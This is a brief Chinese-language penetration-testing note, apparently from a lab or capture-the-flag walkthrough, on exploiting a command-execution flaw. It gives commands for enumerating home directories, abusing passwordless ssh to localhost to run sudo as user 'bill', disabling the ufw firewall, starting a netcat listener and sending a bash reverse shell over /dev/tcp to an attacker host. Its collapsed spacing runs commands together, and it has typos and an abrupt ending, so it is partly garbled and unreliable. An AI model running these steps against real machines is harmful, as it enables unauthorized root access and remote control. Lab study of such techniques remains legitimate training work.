命令执行漏洞 一般查看home目录,挖掘用户信息:ls-alh/home查看具体用户的目录:ls-alh/home/用户名/查看系统信息:uname-a 利用ssh命令执行root权限命令 使用ssh用户名 localhost通过ssh登录服务器是不需要身份验证的;比如查看bill用户sudo命令的权限:sshbill localhostsudo-lubuntu自带防火墙,所以关闭防火墙方便后面的操作。 sshbill localhostsudoufwdisable反弹shell 攻击机启动监听netcat nc-nlvp 查看是否nc正在监听 netstat-pantu 靶场机器反弹shell sshbill locahostsudobash-i/dev/tcp/ip/01然后监听端 渗透测试技巧 开启python简易
|